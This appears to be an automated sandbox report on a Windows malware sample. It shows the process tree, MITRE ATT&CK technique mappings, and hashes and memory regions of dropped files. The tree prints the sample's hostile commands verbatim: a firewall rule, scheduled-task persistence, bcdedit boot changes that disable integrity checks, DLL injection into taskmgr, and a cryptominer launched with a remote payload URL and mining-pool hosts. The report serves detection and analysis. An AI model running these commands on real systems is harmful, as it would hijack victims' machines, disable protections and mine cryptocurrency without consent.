    PID:2612
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Modifies data under HKEY_USERS
      PID:2672
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Manipulates WinMon driver.
    - Manipulates WinMonFS driver.
    - Drops file in Windows directory
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1160
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:1480
  - - C:\Windows\system32\schtasks.exe
      schtasks /delete /tn ScheduledUpdate /f
      4⤵
      PID:1876
  - - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
      "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies system certificate store
      Suspicious use of WriteProcessMemory
      PID:1452
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:748
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:876
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:564
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2176
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2308
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:368
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1808
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2312
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2400
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1752
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1624
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2232
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1584
  - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1220
  - - C:\Windows\system32\bcdedit.exe
      C:\Windows\Sysnative\bcdedit.exe /v
      4⤵
      Modifies boot configuration data using bcdedit
      PID:2228
  - - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
      4⤵
      Executes dropped EXE
      PID:552
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:1940
  - - C:\Windows\windefender.exe
      "C:\Windows\windefender.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2908
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        5⤵
        
        PID:2164
      - C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:2836
  - - C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2188
    - - C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 89bee384-1587-480f-8f93-cf1805276412 --tls --nicehash -o showlock.net:443 --rig-id 89bee384-1587-480f-8f93-cf1805276412 --tls --nicehash -o showlock.net:80 --rig-id 89bee384-1587-480f-8f93-cf1805276412 --nicehash --http-port 3433 --http-access-token 89bee384-1587-480f-8f93-cf1805276412 --randomx-wrmsr=-1
        5⤵
        Executes dropped EXE
        
        PID:2936
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe -hide 2936
        5⤵
        Executes dropped EXE
        
        PID:1708
  - - C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
      4⤵
      Executes dropped EXE
      PID:2892
  - - C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
      4⤵
      Executes dropped EXE
      PID:3028

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240219044811.log C:\Windows\Logs\CBS\CbsPersist_20240219044811.cab
1⤵
- Drops file in Windows directory
PID:3052

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2992

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab6FC5.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

Filesize
8.3MB

MD5
fd2727132edd0b59fa33733daa11d9ef

SHA1
63e36198d90c4c2b9b09dd6786b82aba5f03d29a

SHA256
3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e

SHA512
3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

Filesize
492KB

MD5
fafbf2197151d5ce947872a4b0bcbe16

SHA1
a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020

SHA256
feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71

SHA512
acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar71CB.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

Filesize
1.8MB

MD5
302226e29c52137c544f5475ebecc1db

SHA1
2f28288cdfeb10fdd544695b92e135a85ba22bfb

SHA256
0533842acb46c38dadae58bb349be072ec74d3b5f46c4528d6ca57756e2704f7

SHA512
f425277f2a4d4986f7ab8f6b949b874e9711acd87d11acf6558463a4ecfe07165cd7a88ec94e3048687ff9bfb2879083f42538d7b1fb697d9ae5540b02d65d18

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

Filesize
1.8MB

MD5
28e98890f6687b1bbd94f749386f0f90

SHA1
00009e301bca490151b9d8f32525c4c76ff04620

SHA256
ce610fc29e4ea2ec518a3cc2a48905a0a41da4ecb5f1a3e6cf8cce0fbab97d81

SHA512
e8369447d16594ad141db91451e01dce691bc52a784a27feee55eee28909d0be55534966dc6b62c7cc4fbf70584170ff0574043aff5dd52f4204694181772b94

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

Filesize
64KB

MD5
65083cf9addd68cb47bab7ca77538492

SHA1
d8819fca7cc7972cca279d5902e0b165cedf3bd7

SHA256
bbc7f581ec47c31b7d3bc7b3bcb2668e1883dfe44f1efecde261e242f6714567

SHA512
59ed85d3442b6c0aae1aef05dfab868e4fca00b268fa8d9c0a1fdd4367b9cd89973991ef0587de546941c22aedc13dd2f414533edcdef2c6b43f9dea0e096e0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

Filesize
1.2MB

MD5
0735ae47d0b728fbd6f23abfd897a048

SHA1
5cf812335e95600c99bbc7aa6a676a3f673af789

SHA256
3ea28be60f0566266e30e38c65d1e5dbd88e71a625a14dca92c92459e589f160

SHA512
2993416ac6b1d212aa48956c7ecce5bbe02fd0ea7e9a96f4caab936848cba1376c9a7e488df475eaf5fc39c945a6a274e3ebc77c2212dcd44b5fddc4d2192f90

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

Filesize
1.6MB

MD5
2fa834628db18671f0c20c47d6645677

SHA1
4975aa37535cfe72f23cf1f5a83890497f176be9

SHA256
c01638e22dfbcc16b0f22a7bfa0cdb9110887f27bd809bfac9f25c05af66634e

SHA512
32a35012d083e819259122a94ab3b2124a5752effdf0146ee46669727a1920974c4946bf7f02dba2b26214526d94c5dfdc9540ac9eec556d481eb09215a828e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
281KB

MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe

Filesize
1024KB

MD5
322e8df629621a17af109094edaa7451

SHA1
788e002b2106fe7663fe7497c770d16d524fd876

SHA256
ff8984c3747d2a3d37c3282193de3944e8cb49912904d3c9317f44e869da85bc

SHA512
332c0b42c5b4063e6ee54adebc12c647a452c1a650e8b5074e4d755dfd1a164d2ac33d43b41bab5a25088e054c8d1cf8e71b7d72871e34d22245091f2b0def85

Download Submit
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
896KB

MD5
4a27ef4d1e50c7ee57a6c190760b4464

SHA1
9d333e8b4eeae754532fc76b0dbb8be5c8accd57

SHA256
88798ee292ed2eaf86310e4aa3454e98c3df922bdeaf81f54926b54b767b23d1

SHA512
0970c9ee2656758f22eeecbb36910840f67b2faede12b2c73b0e4ab8aeac35c603b4a4b5383a3add404a108b1d3fbb8fe112076830fb937b2405560886139b90

Download Submit
C:\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
C:\Windows\rss\csrss.exe

Filesize
4.1MB

MD5
122a3c17c74990fddba171cf94ad8ab5

SHA1
f10a7edd419f4e4bea7b689027cb4db07a1b9553

SHA256
6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b

SHA512
81eee32bd51b4a10a0ec8c29672ba81b57f9cd0904f516539360d389c501208a47573ce272c5ff4cdefe089dca3ae231712a137772a7fe5927156747c80239f6

Download Submit
C:\Windows\rss\csrss.exe

Filesize
832KB

MD5
a066cab8a30f89c69fb1090b89c65216

SHA1
9bd11770b600f1a165b77f7935377ad43024189e

SHA256
0f60b8b97646e1614ee19685ddc3fe34ffc29ecbbc2ea6abdad7a4dab015d020

SHA512
79439038d5e78d4aa8d4b0497522f990cc33f0f44fd3ceeff4c7f1ce8393873839d5a1c7759047a01dd3d1ef00fefdbe4ade2e8a74f91caa64187c796d4551cb

Download Submit
C:\Windows\rss\csrss.exe

Filesize
256KB

MD5
9244f4ad6f78bcca6748d0a6c7a01185

SHA1
d45217f810a242b2b65a1651a96912bb76eba9ec

SHA256
7cda33cb80ebda4116a5ef92345c4b787d7d726feed2d0bf7aac30564ed4c0ea

SHA512
dc35820c98d94602aee24a7089c6173666e58e7294a38eaaf7dc6bad4329fe8d5cf7cdc68aeeb177f47c39e069e58dbb0ee179db1af09a1976c842132236a0df

Download Submit
C:\Windows\windefender.exe

Filesize
2.0MB

MD5
8e67f58837092385dcf01e8a2b4f5783

SHA1
012c49cfd8c5d06795a6f67ea2baf2a082cf8625

SHA256
166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

SHA512
40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

Filesize
640KB

MD5
2c50ae80e3da0839d38e8020f0db9a4f

SHA1
2ff7981321f268727a384d9ad43a1b4d02610b03

SHA256
ffb97f31e0edd5dc719f4a09dbc7c1bf591989525dec1458449bc3f61a6eebea

SHA512
86f2f79cb8e25fac234cb3c090abfdfde0c6beed20afc7e5d9cf663752cf5d20e4a29b41ba9fae60c624bb01a449398e5304bb9a08085e9174388a9cfc0348b7

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

Filesize
1.7MB

MD5
b2b0198559537fe4234fbc9a24c471df

SHA1
967a695e0daf39847cd0b8e2b6305186cdf4ca54

SHA256
d9c5f0bf33b4e6dad427b8473cb99c6ec9006e9b34ec404306312670be2671dc

SHA512
5ae6abf07686b0eba6ddbde619bf0f67f9dc6bd3246a6b28d9c0ed94e6de91d83817b9dd60832f5c2338dc9e79db7fd96437671b07f21724fb3377462260d59c

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

Filesize
775KB

MD5
fa260e7a9bebe57e66deeaa265e80025

SHA1
80c3e1ad82ce9c3be6432b556eaef644f13121ae

SHA256
f26a0dc251ba520a84d66d157d1b6c91b0e84120e83232b0689112297c456b56

SHA512
545685f828b56c5be369315df22c1c75a13976f4a640edf931e29f86bcfc7f91d97088d2442e429f8aa9a694912826f3657f9979224e18cb3b9bf14503ce3c6a

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

Filesize
2.0MB

MD5
dcb505dc2b9d8aac05f4ca0727f5eadb

SHA1
4f633edb62de05f3d7c241c8bc19c1e0be7ced75

SHA256
61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

SHA512
31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

Filesize
1.9MB

MD5
09358c8eeb697a91bc136f92db613cc1

SHA1
2032c2c31f47b29b0b7f0b92e1158131c57b616b

SHA256
c69d3316db63fe62fcc07c44f4bcaf1bdea8362dbea64c0e3c3cac1c1027b5df

SHA512
49071934cb8d8fd37c2d0fbc579de34a84251d060d241ef149f8a7310a0557b6f402b387188736189791c3a974ff81c27336c6c303484dfd7b464b45d4ede70d

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

Filesize
94KB

MD5
d98e78fd57db58a11f880b45bb659767

SHA1
ab70c0d3bd9103c07632eeecee9f51d198ed0e76

SHA256
414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

SHA512
aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe

Filesize
832KB

MD5
1022480aad309995f6923d4476bf3658

SHA1
341befc7533495a72eb6e6fe79974acaad878bc9

SHA256
aa67ebbfac0f14636c9638748a2527ff673e7af33695f5935808d8150b09ea28

SHA512
4b606cf24d5aa39f377459a007913da819cde8784d5a1a17819078e951fced2fc4b1176231b06646d35cf515c9421ef09f6620abd613f64973ba311ea73b3cd3

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll

Filesize
1.5MB

MD5
f0616fa8bc54ece07e3107057f74e4db

SHA1
b33995c4f9a004b7d806c4bb36040ee844781fca

SHA256
6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

SHA512
15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
1.7MB

MD5
7544aa90a230fcea9e26f233e14fcf9a

SHA1
0e028e9ee8306881b27f1fa607cc220423ad6ce8

SHA256
8e19d449b01bbe9c15623fd468a0a754998a23c476aff50fa0c8d40f77188207

SHA512
41eb8879134b436d6fa3a339040e19078bcf540985f920d20ff0d72e71bc675a6b30e144971137aa8edcb3023c397fc1e9339c2e2f83340f9f76532a3baab718

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
1.5MB

MD5
de1a2d0502e508ed7405e69743a404af

SHA1
3a42005cf4bfaac9d7cf1df49aac40409c4abe53

SHA256
f6035a9271199e440649b509c2e9daa8bbb8663f6c71518d8de5a3b1593c40c3

SHA512
544c7d651ca3d4f5fdc5a04c1a947f424563a98b334d15e5009b80679ac777865153e92fe108663cf6af24a0850136fb5283ee83cf95450a1239549235724123

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
1024KB

MD5
36faf3a793dbb6e80cd9ec2282ae4404

SHA1
6118ce7d7e64040e97018d6d4383ddfb6f1394e5

SHA256
f8785b8eef542d5f08fdcb9d8d275aab8d8980dece2e4e5c7f26df3b02879cec

SHA512
f395e3d2c71117f5b8256ec25172f280ae74b99e4e7c3eec40e21ab14d486dfaeed3851437851deab9c7c54c3725b3c5a485e562cdd02e548ee9edd1df031e8e

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll

Filesize
163KB

MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Windows\rss\csrss.exe

Filesize
4.0MB

MD5
950182da65e44555b9f07907c2d273c3

SHA1
64011c0e57adb158aa932236e769efe1e61227fb

SHA256
9110d9a592c169799739fe5f5ceaddd57c864f2a9f1774cd8eb6b927c44027de

SHA512
4013da2b642a47c35dcaa9c9cd13fc14db610db5637a1d5885626be36401ec7cf84a6059d73780507bd8f937437a4edd9432c5c8d5faa8c6a4f46f0fed9ec8ee

Download Submit
memory/1160-198-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-188-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-117-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-118-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-257-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-112-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-34-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-33-0x0000000002BD0000-0x00000000034BB000-memory.dmp

Filesize
8.9MB

Download
memory/1160-148-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-32-0x00000000027D0000-0x0000000002BC8000-memory.dmp

Filesize
4.0MB

Download
memory/1160-256-0x000000002D460000-0x000000002D948000-memory.dmp

Filesize
4.9MB

Download
memory/1160-155-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-255-0x000000002D460000-0x000000002DD2D000-memory.dmp

Filesize
8.8MB

Download
memory/1160-251-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-158-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-250-0x000000002D460000-0x000000002D941000-memory.dmp

Filesize
4.9MB

Download
memory/1160-160-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-162-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-248-0x000000002D460000-0x000000002D941000-memory.dmp

Filesize
4.9MB

Download
memory/1160-164-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-166-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-168-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-170-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-172-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-174-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-176-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-178-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-180-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-182-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-184-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-186-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-19-0x00000000027D0000-0x0000000002BC8000-memory.dmp

Filesize
4.0MB

Download
memory/1160-190-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-192-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-194-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-196-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-233-0x000000002D460000-0x000000002D948000-memory.dmp

Filesize
4.9MB

Download
memory/1160-230-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1160-116-0x00000000027D0000-0x0000000002BC8000-memory.dmp

Filesize
4.0MB

Download
memory/1160-203-0x000000002D460000-0x000000002D941000-memory.dmp

Filesize
4.9MB

Download
memory/1160-228-0x000000002D460000-0x000000002D948000-memory.dmp

Filesize
4.9MB

Download
memory/1160-208-0x000000002D460000-0x000000002D941000-memory.dmp

Filesize
4.9MB

Download
memory/1160-219-0x000000002D460000-0x000000002DD2D000-memory.dmp

Filesize
8.8MB

Download
memory/1160-218-0x000000002D460000-0x000000002DD2D000-memory.dmp

Filesize
8.8MB

Download
memory/1452-60-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1452-47-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1708-242-0x0000000002550000-0x0000000002948000-memory.dmp

Filesize
4.0MB

Download
memory/1708-245-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1708-244-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1708-246-0x0000000002550000-0x0000000002948000-memory.dmp

Filesize
4.0MB

Download
memory/1708-243-0x0000000002550000-0x0000000002948000-memory.dmp

Filesize
4.0MB

Download
memory/2188-241-0x0000000000400000-0x00000000008E1000-memory.dmp

Filesize
4.9MB

Download
memory/2572-4-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2572-7-0x0000000002500000-0x00000000028F8000-memory.dmp

Filesize
4.0MB

Download
memory/2572-6-0x0000000002900000-0x00000000031EB000-memory.dmp

Filesize
8.9MB

Download
memory/2572-1-0x0000000002500000-0x00000000028F8000-memory.dmp

Filesize
